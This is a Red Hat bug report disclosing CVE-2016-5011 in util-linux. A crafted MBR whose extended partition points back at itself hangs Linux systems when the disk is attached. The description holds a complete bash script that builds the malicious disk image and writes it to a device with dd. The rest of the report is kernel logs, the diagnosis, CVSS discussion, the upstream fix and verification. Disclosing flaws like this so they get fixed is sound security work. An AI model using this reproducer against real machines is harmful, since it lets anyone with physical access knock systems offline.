Bug 1349536

Summary: Extended partition loop in MBR partition table leads to DOS
Product: Red Hat Enterprise Linux 7
Component: util-linux
Version: 7.2
Hardware: Unspecified
OS: Linux
Status: CLOSED ERRATA
Severity: low
Priority: unspecified
Reporter: Michael Gruhn <michael.gruhn>
Assignee: Karel Zak <kzak>
QA Contact: Vaclav Danek <vdanek>
CC: anemec, cbuissar, kvolny, michael.gruhn, security-response-team, todoleza, vdanek
Keywords: Security
Target Milestone: rc
Target Release: ---
Fixed In Version: util-linux-2.23.2-32.el7
Doc Type: If docs needed, set a value
Type: Bug
Last Closed: 2016-11-03 21:27:30 UTC
Bug Blocks: 1349741

Description Michael Gruhn 2016-06-23 15:57:52 UTC
Created attachment 1171579 [details]
Exploit disk image (use with care ... it is hard to get rid of with just Linux)

Description of problem:
=======================
By connecting a storage medium containing a specially crafted MBR, a local user can cause a Linux system to become unresponsive.

Version-Release number of selected component (if applicable):
=============================================================
CentOS 7
RHEL 7
Ubuntu 14.04
possibly every Linux system

How reproducible:
=================
Always

Steps to Reproduce:
===================
Generate an MBR with two partitions: one primary and one extended. Point the extended partition back at the MBR itself.
This creates a loop that causes a Linux system to repeatedly generate device nodes for the primary partition in the MBR.

Such a prepared disk image can be generated via:
"""
#!/bin/bash
# create a tiny 3-sector image
dd if=/dev/zero of=deathmoch.dd bs=512 count=3
# script fdisk: create one primary partition (1) and one extended partition (2)
(echo x; echo c; echo 42; echo r; echo n; echo p; echo 1; echo 1; echo 1; echo n; echo e; echo 2; echo 2; echo w) | fdisk deathmoch.dd
# rewrite the extended partition entry so its start LBA becomes 0, i.e. it points back at the MBR itself
xxd -ps deathmoch.dd | sed -s 's/830002000100000001000000000003000500030002000000010000000000/830002000100000001000000000003000500030000000000010000000000/' | xxd -r -ps > deathmoch_active.dd
# deathmoch_active.dd now contains the image with the extended partition loop
# you can now trigger the DOS by dd'ing the activated deathmoch onto a
# USB stick (but also HDDs work)
dd if=deathmoch_active.dd of=/dev/sdSELECTLETTER
"""

Actual results:
===============
Ultimately the system becomes unresponsive, because it generates device nodes sdb sdb1 sdb2 sdb3 ... sdb157 (and presumably even more).
This can be seen from /var/log/kern (see end of report for logs).

Expected results:
=================
The system should detect the loop and only generate sdb and sdb1.

Additional info:
================

Possibly systemd-udevd is the culprit, because its activity spikes when such a prepared storage device is connected (hence systemd was originally reported as the component, but the underlying cause may be the kernel uevents received as device nodes are repeatedly generated). See the output of top at the end of the report.
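
One way to observe the resulting event storm directly (a sketch, not part of the original report) is to watch kernel uevents and the corresponding udev events while the crafted device is plugged in:
"""
# print kernel uevents and udev events as they arrive; expect a long
# stream of "add" events for sdbN partition nodes
udevadm monitor --kernel --udev
"""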

On Ubuntu 14.04 the Out-Of-Memory killer eventually kills the systemd-udevd process and the system can recover once the storage device is removed. However, on a Red Hat-based system this is not the case.

Security Impact:
================

4.3 (Medium)

CVSS:3.0/AV:P/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:H/RL:U/RC:C

Personally, however, we regard the security impact as low.

Original discoverer:
====================

Christian Moch

Logs:
=====

/var/log/kern
"""
Jun 23 16:27:48 localhost kernel: usb 2-2: new SuperSpeed USB device number 2 using xhci_hcd
Jun 23 16:27:48 localhost kernel: usb 2-2: New USB device found, idVendor=XXXX, idProduct=XXXX
Jun 23 16:27:48 localhost kernel: usb 2-2: New USB device strings: Mfr=X, Product=X, SerialNumber=X
Jun 23 16:27:48 localhost kernel: usb 2-2: Product: Mass Storage Device
Jun 23 16:27:48 localhost kernel: usb 2-2: Manufacturer: XXX
Jun 23 16:27:48 localhost kernel: usb 2-2: SerialNumber: XXX
Jun 23 16:27:48 localhost kernel: usb-storage 2-2:1.0: USB Mass Storage device detected
Jun 23 16:27:48 localhost kernel: scsi host7: usb-storage 2-2:1.0
Jun 23 16:27:49 localhost kernel: scsi 7:0:0:0: Direct-Access     XXX    1.00 PQ: 0 ANSI: 6
Jun 23 16:27:49 localhost kernel: sd 7:0:0:0: Attached scsi generic sg1 type 0
Jun 23 16:27:49 localhost kernel: sd 7:0:0:0: [sdb] 15433728 512-byte logical blocks: (7.90 GB/7.35 GiB)
Jun 23 16:27:49 localhost kernel: sd 7:0:0:0: [sdb] Write Protect is off
Jun 23 16:27:49 localhost kernel: sd 7:0:0:0: [sdb] Mode Sense: 23 00 00 00
Jun 23 16:27:49 localhost kernel: sd 7:0:0:0: [sdb] Write cache: disabled, read cache: disabled, doesn't support DPO or FUA
Jun 23 16:27:49 localhost kernel:  sdb: sdb1 sdb2 < sdb5 sdb6 sdb7 sdb8 sdb9 sdb10 sdb11 sdb12 sdb13 sdb14 sdb15 sdb16 sdb17 sdb18 sdb19 sdb20 sdb21 sdb22 sdb23 sdb24 sdb25 sdb26 sdb27 sdb28 sdb29 sdb30 sdb31 sdb32 sdb33 sdb34 sdb35 sdb36 sdb37 sdb38 sdb39 sdb40 sdb41 sdb42 sdb43 sdb44 sdb45 sdb46 sdb47 sdb48 sdb49 sdb50 sdb51 sdb52 sdb53 sdb54 sdb55 sdb56 sdb57 sdb58 sdb59 sdb60 sdb61 sdb62 sdb63 sdb64 sdb65 sdb66 sdb67 sdb68 sdb69 sdb70 sdb71 sdb72 sdb73 sdb74 sdb75 sdb76 sdb77 sdb78 sdb79 sdb80 sdb81 sdb82 sdb83 sdb84 sdb85 sdb86 sdb87 sdb88 sdb89 sdb90 sdb91 sdb92 sdb93 sdb94 sdb95 sdb96 sdb97 sdb98 sdb99 sdb100 sdb101 sdb102 sdb103 sdb104 sdb105 sdb106 sdb107 sdb108 sdb109 sdb110 sdb111 sdb112 sdb113 sdb114 sdb115 sdb116 sdb117 sdb118 sdb119 sdb120 sdb121 sdb122 sdb123 sdb124 sdb125 sdb126 sdb127 sdb128 sdb129 sdb130 sdb131 sdb132 sdb133 sdb134 sdb135 sdb136 sdb137 sdb138 sdb139 sdb140 sdb141 sdb142 sdb143 sdb144 sdb145 sdb146 sdb147 sdb148 sdb149 sdb150 sdb151 sdb152 sdb153 sdb154 sdb155 sdb156 sdb157 
Jun 23 16:27:49 localhost kernel: sd 7:0:0:0: [sdb] Attached SCSI removable disk
"""

top:
"""
top - 16:56:09 up 24 min,  1 user,  load average: 1.35, 0.36, 0.22
Tasks: 202 total,  17 running, 185 sleeping,   0 stopped,   0 zombie
%Cpu(s): 26.1 us, 25.7 sy,  0.0 ni, 47.8 id,  0.3 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem : 16126124 total,  7168680 free,  8342044 used,   615400 buff/cache
KiB Swap:  8390652 total,  8390652 free,        0 used.  7455464 avail Mem 

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
 2675 root      20   0  540844 498196   1484 R  14.0  3.1   0:00.42 systemd-udevd
 2688 root      20   0  554300 510976    812 R  13.6  3.2   0:00.41 systemd-udevd
 2694 root      20   0  549232 505720    788 R  13.6  3.1   0:00.41 systemd-udevd
 2695 root      20   0  540160 496744    788 R  13.0  3.1   0:00.39 systemd-udevd
 2692 root      20   0  532980 489972   1196 R  12.6  3.0   0:00.38 systemd-udevd
 2693 root      20   0  531884 488916   1192 R  12.6  3.0   0:00.38 systemd-udevd
 2704 root      20   0  517308 473756    788 R  12.3  2.9   0:00.37 systemd-udevd
 2696 root      20   0  510712 467176    788 R  12.0  2.9   0:00.36 systemd-udevd
 2697 root      20   0  513744 470320    788 R  12.0  2.9   0:00.36 systemd-udevd
 2698 root      20   0  513240 469792    788 R  12.0  2.9   0:00.36 systemd-udevd
 2699 root      20   0  510624 467152    788 R  12.0  2.9   0:00.36 systemd-udevd
 2701 root      20   0  510120 466624    788 R  12.0  2.9   0:00.36 systemd-udevd
 2702 root      20   0  512088 468736    788 R  12.0  2.9   0:00.36 systemd-udevd
 2705 root      20   0  512348 469004    788 R  12.0  2.9   0:00.36 systemd-udevd
 2700 root      20   0  505840 462400    788 R  11.6  2.9   0:00.35 systemd-udevd
 2703 root      20   0  508804 465308    788 R  11.6  2.9   0:00.35 systemd-udevd
  879 root      20   0   47096   5616   2728 S   1.0  0.0   0:00.94 systemd-udevd
  850 root      20   0   36968   5192   4868 S   0.7  0.0   0:00.30 systemd-journal
 2584 root      20   0       0      0      0 S   0.7  0.0   0:00.28 kworker/u16:1
   43 root      20   0       0      0      0 S   0.3  0.0   0:00.01 kdevtmpfs
 2270 XXXX      20   0 1434028 471856  60568 S   0.3  2.9   2:17.63 firefox
 2674 XXXX      20   0  157672   2204   1536 R   0.3  0.0   0:00.02 top
[...]
"""

Comment 3 Cedric Buissart 2016-06-30 08:44:46 UTC
Currently re-attaching this to util-linux.
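
(For reference: the /dev/loop0 used below was presumably attached from the crafted image roughly like this; losetup -f picks the first free loop device and --show prints its name.)

# losetup -f --show deathmoch_active.dd
/dev/loop0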


=> Currently, partx loops for a while, and triggers an assertion as well as an OOM kill:

# dmesg -c
# time partx /dev/loop0
partx: disk-utils/partx.c:564: add_tt_line: Assertion `par' failed.
Killed

real    0m40.993s
user    0m0.520s
sys     0m7.478s
# dmesg | grep -A1 "Out of memory:"
[235537.790468] Out of memory: Kill process 12459 (partx) score 847 or sacrifice child
[235537.790505] Killed process 12459 (partx) total-vm:1796284kB, anon-rss:881108kB, file-rss:4kB


=> The patch prevents that:
# yum update ./{libblkid,libmount,libuuid,util-linux}*.rpm
# time partx /dev/loop0
NR START END SECTORS SIZE NAME UUID
 1     1   1       1 512B     
 2     0   0       1 512B     
 5     1   1       1 512B     

real    0m0.003s
user    0m0.000s
sys     0m0.003s

Comment 4 Cedric Buissart 2016-07-04 14:18:49 UTC
A CVE has been assigned for this issue: CVE-2016-5011

Comment 5 Karel Zak 2016-07-07 07:55:37 UTC
And is the kernel fine with the partition table? The message

   sdb: sdb1 sdb2 < sdb5 ...

is from the kernel, and I guess it generates an event for each detected partition.

Comment 6 Karel Zak 2016-07-07 12:28:56 UTC
Fixed (libblkid) by upstream commit 7164a1c34d18831ac61c6744ad14ce916d389b3f.
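
For reference, the change can be inspected directly from the upstream util-linux tree (URL assumed to be the kernel.org repository):

git clone https://git.kernel.org/pub/scm/utils/util-linux/util-linux.git
cd util-linux
git show 7164a1c34d18831ac61c6744ad14ce916d389b3f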

Comment 7 Cedric Buissart 2016-07-11 08:00:50 UTC
(In reply to Karel Zak from comment #5)
> And is the kernel fine with the partition table? The message
> 
>    sdb: sdb1 sdb2 < sdb5 ...
> 
> is from the kernel, and I guess it generates an event for each detected partition.

Yes, the kernel will loop until the limit set in {struct parsed_partitions} is reached. That limit is decided by the disk_max_parts() function. So it might be annoying, but won't be infinite (parse_extended() in msdos.c -> http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/block/partitions/msdos.c#n120 )
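
(A quick way to see that per-disk ceiling on a running system, assuming the sysfs ext_range attribute reflects disk_max_parts() for the disk:)

# cat /sys/block/sdb/range        # classic minor range of the disk
# cat /sys/block/sdb/ext_range    # extended range, i.e. the maximum number of partitions scanned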

Comment 12 Andrej Nemec 2016-07-13 13:37:06 UTC
(In reply to Michael Gruhn from comment #0)
> Security Impact:
> ================
> 
> 4.3 (Medium)
> 
> CVSS:3.0/AV:P/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:H/RL:U/RC:C
> 
> Personally, however, we regard the security impact as low.
> 

Hi, just a quick question: why is user interaction needed for this to trigger? AFAIK the only requirement here is to have a malicious storage medium and insert it; no action should be needed from the victim?

Wouldn't a better CVSS vector be this?

4.3 (Medium)

CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:H/RL:U/RC:C

Thanks

Comment 13 Michael Gruhn 2016-07-13 14:11:29 UTC
(In reply to Andrej Nemec from comment #12)
> Wouldn't a better CVSS vector be this?
> 
> 4.3 (Medium)
> 
> CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:H/RL:U/RC:C
> 
> Thanks

Yes, you are correct. On both PR:L and UI:N.

Comment 14 Cedric Buissart 2016-07-14 11:18:17 UTC
(In reply to Michael Gruhn from comment #13)
> (In reply to Andrej Nemec from comment #12)
> > Wouldn't a better CVSS vector be this?
> > 
> > 4.3 (Medium)
> > 
> > CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:H/RL:U/RC:C
> > 
> > Thanks
> 
> Yes, you are correct. On both PR:L and UI:N.

I would keep PR=N => the attack does not require any privilege & works even if no one is logged in.

4.6: 
CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:H/RL:U/RC:C

Comment 15 Andrej Nemec 2016-07-14 11:20:23 UTC
> I would keep PR=N => the attack does not require any privilege & works even
> if no one is logged in.
> 
> 4.6: 
> CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:H/RL:U/RC:C

Ack, after a thorough discussion this is the correct score.

We will be using:

4.6/CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Comment 16 Vaclav Danek 2016-09-27 11:57:18 UTC
Verified both reproducers on util-linux-2.23.2-33.el7.x86_64.
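
(A minimal sketch of such a verification run, assuming the loop-device reproducer from comment 3:)

# rpm -q util-linux
# time partx /dev/loop0    # should print the short partition table immediately instead of looping and being OOM-killed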
=> Verified

Comment 18 errata-xmlrpc 2016-11-03 21:27:30 UTC
Since the problem described in this bug report should be
resolved in a recent advisory, it has been closed with a
resolution of ERRATA.

For information on the advisory, and where to find the updated
files, follow the link below.

If the solution does not work for you, open a new bug report.

https://rhn.redhat.com/errata/RHSA-2016-2605.html